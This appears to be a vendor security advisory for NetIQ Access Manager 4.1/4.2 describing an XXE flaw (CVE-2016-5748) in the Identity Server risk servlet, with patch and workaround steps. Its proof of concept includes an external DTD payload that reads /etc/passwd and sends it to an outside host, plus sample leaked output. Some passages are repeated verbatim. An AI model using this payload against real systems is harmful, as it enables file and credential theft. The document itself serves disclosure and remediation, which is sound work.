Environment
NetIQ Access Manager 4.2
NetIQ Access Manager 4.1
Access Manager Identity Server
CVE-2016-5748
NetIQ Access Manager 4.1
Access Manager Identity Server
CVE-2016-5748
Situation
Access Manager 4.1 and 4.2 support risk based authentication on the Identity Server. Available with this feature is the risk servlet (/nidp/test/risk) that allows administrators and users verify that their risk scores are. It is possible to modify the accompanying JSP page to trigger an External Entity Processing (XXE) vulnerability (https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing).
To do this, one needs access to modify /opt/novell/nids/lib/webapp/jsp/risk.jsp and change the default DTD file (loose.dtd) to point to another DTD file that does more damage eg. with a remotely accessible DTD you can execute an XXE attack that can in turn read the file system and any readable file on the IDP.
a) create sample DTD (test.dtd) on a web server for file access on the attacked system:
pentest@nam:~/neil$ cat test.dtd
<!ENTITY % p1 SYSTEM "file:///etc/passwd"> <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://10.1.1.1/bla#%p1;'>">%p2;
b) modify the risk.jsp to point to the test.dtd file created on the web server in a) above:
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://10.1.1.1/test.dtd" > <foo>&e1;</foo>
c) Access the risk servlet at https://login.netiq.com.com/nidp/test/risk where login.netiq.com is the IDP server domain name, and confirm you see thecontents of /etc/password in browser:
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"><SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>Client</faultcode><faultstring>http://10.1.1.1/bla#root:x:0:0:root:/root:/bin/bash
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false
To do this, one needs access to modify /opt/novell/nids/lib/webapp/jsp/risk.jsp and change the default DTD file (loose.dtd) to point to another DTD file that does more damage eg. with a remotely accessible DTD you can execute an XXE attack that can in turn read the file system and any readable file on the IDP.
a) create sample DTD (test.dtd) on a web server for file access on the attacked system:
pentest@nam:~/neil$ cat test.dtd
<!ENTITY % p1 SYSTEM "file:///etc/passwd"> <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://10.1.1.1/bla#%p1;'>">%p2;
b) modify the risk.jsp to point to the test.dtd file created on the web server in a) above:
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://10.1.1.1/test.dtd" > <foo>&e1;</foo>
c) Access the risk servlet at https://login.netiq.com.com/nidp/test/risk where login.netiq.com is the IDP server domain name, and confirm you see thecontents of /etc/password in browser:
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"><SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>Client</faultcode><faultstring>http://10.1.1.1/bla#root:x:0:0:root:/root:/bin/bash
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false
Resolution
Apply 4.2.2 for NAM 4.2; or 4.1.2 Hot Fix 1 for NAM 4.1.
As a workaround, one can also disable the risk.jsp in the web.xml file at /opt/novell/nids/lib/webapp/WEB-INF/web.xml. Simply delete the following lines and restart the IDP server with 'rcnovell-idp restart':
<!-- To disable the risk module test tool block below servlet and servlet-mapping tags -->
<servlet>
<servlet-name>riskjsp</servlet-name>
<display-name>test risk group</display-name>
<jsp-file>
/jsp/risk.jsp
</jsp-file>
</servlet>
As a workaround, one can also disable the risk.jsp in the web.xml file at /opt/novell/nids/lib/webapp/WEB-INF/web.xml. Simply delete the following lines and restart the IDP server with 'rcnovell-idp restart':
<!-- To disable the risk module test tool block below servlet and servlet-mapping tags -->
<servlet>
<servlet-name>riskjsp</servlet-name>
<display-name>test risk group</display-name>
<jsp-file>
/jsp/risk.jsp
</jsp-file>
</servlet>